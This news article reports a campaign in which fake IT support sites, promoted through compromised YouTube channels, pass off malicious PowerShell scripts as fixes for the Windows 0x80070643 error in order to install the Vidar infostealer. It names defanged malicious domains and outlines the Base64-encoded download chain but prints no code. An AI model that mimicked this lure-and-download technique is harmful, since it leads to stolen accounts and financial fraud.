Malicious PowerShell Scripts Posed as Windows Fixes by Fake IT Support Sites

June 30, 2024

Fake IT support websites are distributing harmful PowerShell scripts disguised as solutions to common Windows errors, such as the 0x80070643 error, to infect devices with malware that steals information. These fraudulent support sites are being promoted via compromised YouTube channels, adding a sense of legitimacy to the content. The threat actors are specifically targeting the 0x80070643 error that has been troubling millions of Windows users since January.

The 0x80070643 error surfaced after Microsoft released security updates to fix a BitLocker encryption bypass flaw, tracked as CVE-2024-20666, during the January 2024 Patch Tuesday. Following the update, Windows users worldwide reported receiving '0x80070643 - ERROR_INSTALL_FAILURE' when trying to install the update. The error message displayed by Windows Update was incorrect, as it should have shown a CBS_E_INSUFFICIENT_DISK_SPACE error on systems with a Windows Recovery Environment (WinRE) partition that's too small for the update to install.

Expanding the WinRE partition is a complex task, and for some users, it's impossible if the WinRE is not the last partition on the drive. This has left many unable to install the security update, and they are continuously receiving the 0x80070643 error message every time they use Windows Update. This has led many frustrated Windows users to search for a solution online, providing an opportunity for threat actors to exploit their search for a fix.

eSentire's Threat Response Unit (TRU) observed a case in June 2024 involving a Vidar Stealer infection initiated through a fake IT support website. The infection began when the victim performed a web search for solutions to a Windows Update Error code. The researchers discovered two fake IT support sites promoted on YouTube named pchelprwizzards[.]com and pchelprwizardsguide[.]com. Additional sites were also found, including pchelprwizardpro[.]com, pchelperwizard[.]com, and fixedguides[.]com. These sites all offer fixes that require users to copy and run a PowerShell script or import the contents of a Windows Registry file.

Regardless of the 'solution' used, a PowerShell script will be executed that downloads malware onto the device. The PowerShell script contains a Base64 encoded script that connects to a remote server to download another PowerShell script, which installs the Vidar information-stealing malware on the device. After the script is completed, it displays a message that the fix was successful and prompts the user to restart the computer, which also triggers the malware.

The stolen data is used to fuel other attacks, such as ransomware attacks, or sold to other threat actors on dark web marketplaces. The infected user is left with a nightmare, having all their accounts compromised and potentially suffering financial fraud. It is crucial to download software and fixes only from trusted websites, not from random videos and websites with little or no reputation.

Related News

Latest News

Like what you see?

Get a digest of headlines, vulnerabilities, risk context, and more delivered to your inbox.

Subscribe Below

By submitting this form, you’re giving us permission to email you. You may unsubscribe at any time.

Accelerate Security Teams

Continuously identify and prioritize the risks that are most critical in your environment, and validate that your remediation efforts are reducing risk. An always-on single source-of-truth of your assets, services, and vulnerabilities.